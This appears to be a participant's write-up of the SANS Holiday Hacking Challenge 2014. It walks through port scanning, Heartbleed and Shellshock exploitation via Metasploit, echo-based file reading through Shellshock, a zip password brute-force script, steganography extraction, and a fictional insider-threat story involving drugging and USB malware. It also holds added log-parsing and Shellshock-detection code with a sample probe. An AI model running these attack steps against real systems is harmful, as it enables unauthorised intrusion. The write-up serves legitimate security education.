A Christmas Hacking Carol
SANS Holiday Hacking Challenge 2014
“A Christmas Hacking Carol”
Report Created:
Sunday, January 4, 2015
Suave Security
Web: http://www.SuaveSecurity.com
E-mail: [email protected]
Office: +1 641-715-3900 ext. 556377#
Table of Contents
Executive Summary ........................................................ 1
Attack Narrative ......................................................... 2
    The Ghost of Hacking Past ............................................ 2
        Task #1: Time to say hello to Eliza .............................. 2
        Task #2: Surf the Internet together .............................. 3
    The Ghost of Hacking Present ......................................... 4
        Task #1: Heartbleed .............................................. 4
        Task #2: Shellshock .............................................. 5
    The Ghost of Hacking Future .......................................... 6
        Task #1: Analyze hhusb.dd.bin .................................... 6
        Task #2: Analyze LetterFromJackToChuck.doc ....................... 6
        Task #3: Analyze hh2014-chat.pcapng .............................. 8
        Task #4: Analyze hh2014-chat.pcapng_Bed_Curtains.zip ............. 9
        Task #5: Analyze Tiny_Tom_Crutches_Final.jpg ..................... 11
Conclusion ............................................................... 12
The Real Story ........................................................... 13
Executive Summary
Suave Security took on the task of identifying what steps Scrooge went through in order to
obtain 7 secret messages. We had Scrooge’s consent to investigate the following IP
addresses:
- 173.255.233.59
- 23.239.15.124
    o (http://www.scrooge-and-marley.com) ports 80 / 443 only
Efforts were taken to provide as much detail as possible so that the steps could be easily
repeatable. Throughout the investigation we discovered evidence that led us to question a
Mr. Bob Cratchit. The story he provided to us can be found in the “Real Story” section at the
bottom of this report. We have yet to go to the authorities with this information.
Written By: Joshua Tomkiel
Copyright 2014
Page 1 of 17
Attack Narrative
The Ghost of Hacking Past
The Ghost of Hacking Past, Mr. Alan Turing, gave this hint to Scrooge:
“Before I depart, I’d like to introduce you to an old friend of mine. She’s at
173.255.233.59 and has an important message to share with you, Scrooge. Feel
free to connect with her, surf the Internet together, and see if you can discover
her secret.”
Task #1: Time to say hello to Eliza
First, I ran a port scan to see what services were running:
root@kali:~# nmap 173.255.233.59 -A -T4 -p 1-65535
The high port, 31124, seems interesting; let's see if I can get any banner information:
root@kali:~# nc 173.255.233.59 31124
Here is Eliza. She’s a chat bot that responds to keywords such as “turing”, “turing
machine”, “secret”, and “enigma”.
If you type “secret” or “enigma” 3 times, you’ll get the next tip.
But the most interesting trigger of all was the “surf to” command. Time to dig deeper.
Task #2: Surf the Internet together
Eliza holds a secret. In order to discover it, I had to “surf the Internet with her.” I spun up a
virtual Ubuntu server instance on Amazon's EC2 free hosting tier, installed Apache and
set up a test page. I then issued the following command to Eliza:
“surf to http://54.68.208.14/index.html”
My basic website on Amazon EC2
I was also tailing the Apache access.log file at the same time:
tail -f /var/log/apache2/access.log
The following entry appeared in the log:
173.255.233.59 - - [28/Dec/2014:14:35:44 +0000] "GET /index.html HTTP/1.1"
200 283 "-" "Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me
by surprise with great frequency. -Alan Turing""
Initially I thought that I could use her as a proxy but I was looking into it too much. After
hours of attempting different ways to get her to actually go to a URL, I ultimately told her
what she was asking for.
Eliza Secret: "Machines take me by surprise with great frequency.
-Alan Turing"
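Eliza's secret arrived inside the User-Agent field, and that field itself contains double quotes, which trips up naive field-by-field parsers of the Apache combined log format. The parser below is an added example (not part of the original report); it captures the final quoted field greedily so the whole User-Agent survives, then pulls the "Eliza Secret:" text out of it. The first and third sample lines are constructed; the second is the entry shown above.

```python
import re
from typing import List, Optional, Tuple

# Apache "combined" log format. The last quoted field (User-Agent) is matched
# greedily (.*) up to the final quote on the line, so a UA that carries its own
# embedded double quotes, as Eliza's does, is taken whole instead of being cut
# at the first quote inside it.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
# The secret sits between a quote pair inside the User-Agent.
SECRET_RE = re.compile(r'Eliza Secret: "(?P<secret>.*)"')


def parse_combined(line: str) -> Optional[dict]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def eliza_secret(agent: str) -> Optional[str]:
    """Extract the quoted secret from a User-Agent string, if present."""
    m = SECRET_RE.search(agent)
    return m.group("secret") if m else None


def find_secrets(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Scan log lines and return (client host, request, secret) for each hit."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # not a combined-format line; skip rather than crash
        secret = eliza_secret(rec["agent"])
        if secret:
            hits.append((rec["host"], rec["request"], secret))
    return hits


SAMPLE_LOG = [
    # Ordinary browser hit (constructed).
    '203.0.113.7 - - [28/Dec/2014:14:30:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/34.0"',
    # The entry Eliza produced, as printed in the report.
    '173.255.233.59 - - [28/Dec/2014:14:35:44 +0000] "GET /index.html HTTP/1.1" '
    '200 283 "-" "Mozilla/5.0 (Bombe; Rotors:36) Eliza Secret: "Machines take me '
    'by surprise with great frequency. -Alan Turing""',
    # A line that is not in combined format at all (constructed).
    "garbage that should be skipped",
]

if __name__ == "__main__":
    for host, request, secret in find_secrets(SAMPLE_LOG):
        print(f"{host} {request!r} -> {secret}")
```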
The Ghost of Hacking Present
The Ghost of Hacking Present, Johnny Long, gave this hint to Scrooge:
“I've magically introduced two special secrets on your very own company website,
www.scrooge-and-marley.com. Those secrets should shock your heart, teaching
you important lessons for all time."
http://www.scrooge-and-marley.com is vulnerable to Shellshock and Heartbleed.
Task #1: Heartbleed
root@kali:~# use auxiliary/scanner/ssl/openssl_heartbleed
Data leaked:
0for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%
20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%2
0black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form
%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20B
ut%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20fr
om%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it
%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2ek
Website Secret #1: Hacking can be noble.
Task #2: Shellshock
root@kali:~# use auxiliary/scanner/http/apache_mod_cgi_bash_env
This was challenging since only the echo and pwd commands returned output. Working
entirely through echo, I had to figure out how to change directories, print the current
directory, distinguish files from directories and, finally, read the contents of a file.
Read the secret file:
echo $(cd /; pwd; while read line; do echo $line; done <secret)
Show only directories:
echo $(cd /; pwd; for f in */; do echo "$f"; done)
Change directories and list the current directory:
echo $(cd ..; cd ..; cd ..; pwd; for f in *; do echo "$f"; done)
Website Secret #2: Use your skills for good.
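Seen from the defender's side, the Shellshock requests that reach a CGI handler are easy to spot: the header value begins with a Bash function definition marker, "() {", which mod_cgi copies into the CGI environment. The detector below is an added example, not part of the report; it parses a raw HTTP request into headers and flags the ones carrying that marker. The two sample requests are constructed, with a harmless echo standing in for whatever a real probe would carry.

```python
import re
from typing import List, Tuple

# The marker every Shellshock probe must carry in a header value: an empty
# parameter list followed by an opening brace, with optional whitespace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_request_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a raw HTTP request into (lower-cased name, value) header pairs.

    Stops at the blank line that ends the header block and joins obs-fold
    continuation lines onto the previous header so a marker split across a
    fold is not missed.
    """
    headers: List[Tuple[str, str]] = []
    for line in raw.split("\r\n")[1:]:  # [0] is the request line
        if line == "":
            break
        if line[:1] in (" ", "\t") and headers:
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def shellshock_hits(raw: str) -> List[str]:
    """Return the names of headers whose value looks like a Shellshock probe."""
    return [name for name, value in parse_request_headers(raw)
            if SHELLSHOCK_RE.search(value)]


# Constructed sample requests; the host name is a placeholder.
BENIGN = ("GET /cgi-bin/status HTTP/1.1\r\nHost: www.example.test\r\n"
          "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n")
PROBE = ("GET /cgi-bin/status HTTP/1.1\r\nHost: www.example.test\r\n"
         "User-Agent: () { :; }; echo probe\r\n"
         "Referer: ()\t{ echo probe; }\r\n\r\n")

if __name__ == "__main__":
    for label, request in (("benign", BENIGN), ("probe", PROBE)):
        print(label, shellshock_hits(request))
```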
The Ghost of Hacking Future
The Ghost of Hacking Future left Scrooge without any hints:
“It was shrouded in a deep black garment, which concealed its head, its face, its
form, and left nothing of it visible save one outstretched hand. That hand bore a
device the Ghoul proffered to Scrooge, a single USB thumb drive bearing untold
secret horrors.”
Task #1: Analyze hhusb.dd.bin
I ran strings on the .bin file to see if there was anything that jumped out at me. After
parsing through the entire print out, I attempted to mount the .bin file by changing the file
extension to .iso. However, not all files were displayed:
Extracting the .bin file with 7-ZIP on a Windows VM showed everything I needed and more:
Task #2: Analyze LetterFromJackToChuck.doc
I transferred the extracted folder back to my Kali VM and ran strings on the Word
document:
strings -16 LetterFromJackToChuck.doc | uniq
The secret appeared at the bottom of the file:
USB Secret #1: Your demise is a source of mirth.
Task #3: Analyze hh2014-chat.pcapng
I ran strings on the PCAPNG file and found a message followed by a Base64-encoded string:
"I've just told our children about Mr. Scrooge's death, and all of their faces are brighter for it.
We now have a very happy house. I so love you."
VVNCIFNlY3JldCAjMjogWW91ciBkZW1pc2UgaXMgYSBzb3VyY2Ugb2YgcmVsaWVmLg==
Decoded via command line:
USB Secret #2: Your demise is a source of relief.
I also uploaded the file to http://pcapng.com/. This site was able to display the Base64 encoded
string and highlighted an interesting URL:
The URL also sticks out when grepping for anything that starts with http, which will come in
handy later…
strings -16 hh2014-chat.pcapng | uniq | grep http
Small sample of output:
Location: http://10.10.10.1:1780/InternetGatewayDevice.xml
Location: http://10.10.10.1/HNAP1/
Location: http://10.10.10.1/HNAP1/
Referer: http://chat.scrooge-and-marley.com/
Referer: http://chat.scrooge-and-marley.com/
Referer: http://chat.scrooge-and-marley.com/
https://code.google.com/p/f5-steganography/
Referer: http://chat.scrooge-and-marley.com/
Referer: http://chat.scrooge-and-marley.com/
Referer: http://chat.scrooge-and-marley.com/
Task #4: Analyze hh2014-chat.pcapng_Bed_Curtains.zip
The zip file was password protected. I ran CeWL on scrooge-and-marley.com to create a
wordlist based on a tip by the Ghost of Hacking Past and a tweet:
Source: https://twitter.com/pentesttips/status/544869613662507008
cewl www.scrooge-and-marley.com -w scrooge-and-marley-wordlist.txt
I used the wordlist and the script below to brute force the zip file using John:
http://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/
Code:
#!/bin/bash
# Feed a wordlist through John's rule engine and try each candidate as the zip password.
echo "ZIP-JTR Decrypt Script"
if [ $# -ne 2 ]; then
    echo "Usage: $0 <zipfile> <wordlist>"
    exit 1
fi
zipfile="$1"
wordlist="$2"
unzip -l "$zipfile"
# Read one candidate per line so passwords containing spaces stay intact;
# a for-loop over $(...) would split them on whitespace.
john --wordlist="$wordlist" --rules --stdout | while IFS= read -r candidate; do
    printf '\rtrying "%s" ' "$candidate"
    # unzip exits 0 only when the password decrypts the archive.
    if unzip -o -P "$candidate" "$zipfile" >/dev/null 2>&1; then
        printf '\nArchive password is: "%s"\n' "$candidate"
        break
    fi
done
./zip-jtr.sh hh2014-chat.pcapng_Bed_Curtains.zip scrooge-and-marleywordlist.txt
Archive password is: "shambolic"
I ran strings on the extracted image "Bed_Curtains.png":
USB Secret #3: Your demise is a source of gain for others.
Task #5: Analyze Tiny_Tom_Crutches_Final.jpg
Inside the extracted .bin, there was a folder named [DELETED]. Inside that folder was an
image named "Tiny_Tom_Crutches_Final.jpg".
Using the F5 steganography tool from the link found in the PCAP file
(https://code.google.com/p/f5-steganography/), I was able to extract the final USB Secret:
java -jar f5.jar x -e secret.txt Tiny_Tom_Crutches_Final.jpg
USB Secret #4: You can prevent much grief and cause much joy.
Hack for good, not evil or greed.
Conclusion
The challenges that Scrooge had to overcome in order to obtain the secret messages ranged
from petty personal attacks (e.g., chats purposely left within a packet capture for him to
find, stating how happy people are now that he’s dead) to downright dangerous remotely
accessible and publicly disclosed exploits which could severely damage his company and
reputation if left unmitigated (Heartbleed and Shellshock). Yes, these, along with the rest of
the challenges covered within this report could have been introduced by three “spirits” as
depicted in “A Christmas Hacking Carol” story. However, I would like to propose an
alternate scenario: a more realistic explanation as to what actually occurred to Scrooge that
Christmas Eve. Evidence has been discovered proving that Scrooge fell victim to an
often-overlooked threat that is all too common today: the disgruntled employee, otherwise
known as the "insider threat."
The Real Story
Bob Cratchit had worked alongside his wife, Lynn, under Scrooge’s unforgiving iron fist for
many years. Although not directly mentioned in “A Christmas Hacking Carol” story, Bob
was merely an apprentice to Scrooge and eager to learn as much as he could about
anything security related. Bob had a curious mind and when he was not reading up on the
latest exploits and industry news, he would be working in his home lab to develop his own
0-day exploits. Bob’s desk was in the back far corner behind his wife in the Secret Room
connected to Scrooge’s Main Laboratory. Bob was fascinated by genealogy and had been
known to brag about his relation to Dr. Alan Mathison Turing from time to time.
One day, Bob asked Scrooge for professional training to further enhance his exploit
development skills. Just like coal for the fire, training costs money and Scrooge wasn’t
about to pay a penny! He would respond to any training requests with “Bah, Humbug! Just
YouTube it!” Alas, Bob knew that YouTube was no match for the high quality, on-demand
training that the SANS Institute could offer. Defeated and discouraged, Bob sulked back to
his desk. He knew that without additional training, he could never hope to compete with
the likes of Scrooge. Scrooge had made too many powerful connections during his years of
exploit peddling for Bob to challenge him straight on. Let's just say Scrooge knew some
people who could make Bob "disappear". If Bob were to surpass Scrooge, he would have to
bring him down to his level. Bob devised a plan to do just that. He was going to
affect Scrooge in such a way that would make him open to supporting professional growth
and promote a more positive work environment, or he would bring down the company
altogether. It was all going to go down tomorrow, on Christmas Eve.
Much like many unmarried lonely men in their 50’s, Scrooge sought comfort from a bottle
during the holiday season. Bob knew this and used it to his advantage. He planned to spike
Scrooge's drink with a powerful hallucinogen called dimethyltryptamine (DMT), which when
taken orally has a 90 – 125 minute delay before the effects start kicking in (according to
Wikipedia). Later that afternoon while Scrooge was busy talking with his nephew, who
stopped by the Main Laboratory unannounced, Bob capitalized on the moment to add the
liquid DMT into Scrooge’s cup. No one was the wiser. After Scrooge dismissed his cheerful
nephew, he went back to his desk and continued to drink. Phase 1 was now complete.
The time was approaching 5:00pm and the business day was coming to a close. Bob placed
his hand in his pocket, ensuring that he was still in possession of two small USB flash
drives. One was going to be used to plant malware on Scrooge’s MacBook. The other was to
be used to attack Scrooge on an emotional level during the final phase of his plan.
Scrooge left his MacBook unattended and unlocked as he made some notes in his business
ledger. Bob moved quickly into action. Quietly, he crouched down and slipped in a USB
flash drive that contained custom malware he’d written specifically for this moment.
Within a few seconds, the payload was executed and a backdoor was established to Bob’s
C&C server. This was insurance, just in case things didn’t go as planned.
Exhibit A: A photo taken by Mrs. Cratchit the exact moment Bob Cratchit infected Scrooge’s
MacBook with custom malware while his back was turned. This was posted on Twitter via
Mrs. Cratchit's account: #Brag #MyManProvides #MacsDontGetViruses
With Scrooge still distracted, Bob connected via SSH with Scrooge’s stored credentials to
the production webserver hosting scrooge-and-marley.com (23.239.15.124). Then, he
downgraded the installed versions of Bash and OpenSSL, making the server vulnerable to
Shellshock and Heartbleed. He had already setup a separate server hosting an Eliza chat bot
to pay homage to his distant cousin, Dr. Alan Mathison Turing. Phase 2 was complete.
Moving on to phase 3, Bob had to make Scrooge’s old exploit machine, Marley, look like it
was back online. Bob located the dusty old server in the Server Room. He noticed that the
Ethernet cable had been crimped by hand and a few of the copper wires were not pushed
all the way in to the RJ45 connector. “Cheap ol’ Scrooge. Couldn’t even spring for some
inexpensive cables from monoprice.com.” Bob muttered to himself. He replaced the cable
with a new one and saw the LED lights start flashing on the NIC. “Layer 1 of the OSI model
is so often overlooked.” Bob previously had been granted SSH access to this server and had
root privileges on this box. He quickly connected and customized the MOTD text to display
a cryptic message for Scrooge when he logged in next time. All that was left was to play the
waiting game. He knew Scrooge was going to run his weekly internal vulnerability scan
shortly. Bob connected his laptop to one of the SPAN ports on the switch and proceeded to
sniff the traffic with Wireshark. Patiently, he waited until he saw the SSH connection from
the source of Scrooge’s laptop IP to the destination of Marley’s server IP. An hour passed
by, then it happened! There was the traffic he’d been waiting for! He gave it another 15
seconds, enough time for Scrooge to read the message, and then abruptly powered down
Marley. Moments later, Scrooge’s footsteps could be heard as he ran towards the Server
Room. Bob closed his laptop and slid behind one of the server racks. It was evident that the
effects of the hallucinogen had started to take their toll on Scrooge. Scrooge stumbled
approaching the Server Room. Bob witnessed Scrooge wobble in the doorway and prop
himself up against the door, struggling to maintain his balance. Scrooge stared hard into the
room, began to recoil in horror, waved his hands in the air, screamed and ran out the door
towards his bedroom. “Well, that was weird.” Bob thought to himself. Most importantly,
phase 3 was complete.
Phase 4 of the plan was perhaps the most risky of all. Bob was going to actually interact
with Scrooge. Bob laid out three outfits in the Back Office. Each was to present a different
message and challenge to Scrooge. The plan went better than Bob could have ever
imagined, infinitely better! Scrooge was out of his mind the entire time due to the
hallucinogen. It took all Bob had to maintain composure and not burst out laughing as
Scrooge believed every word he said. Bob introduced himself as “The Ghost of Hacking Past
- Dr. Alan Turing”, “The Ghost of Hacking Present - Johnny Long”, and the “Ghost of Hacking
Future” which was really just a big Grim Reaper costume he had from last Halloween.
Scrooge was a changed man after the experience, paying for training whenever it was
requested! Scrooge went on to tell the story of what happened to him that night to anyone
that would listen. Previously, only Mr. and Mrs. Cratchit knew the truth of what happened
that night, and now you do too.
In closing, remember that there will always be new vulnerabilities with nicknames
sprawled across the headlines. However, I implore you to not forget about the threats that
may be already inside your organization, purely waiting for the appropriate moment to
strike.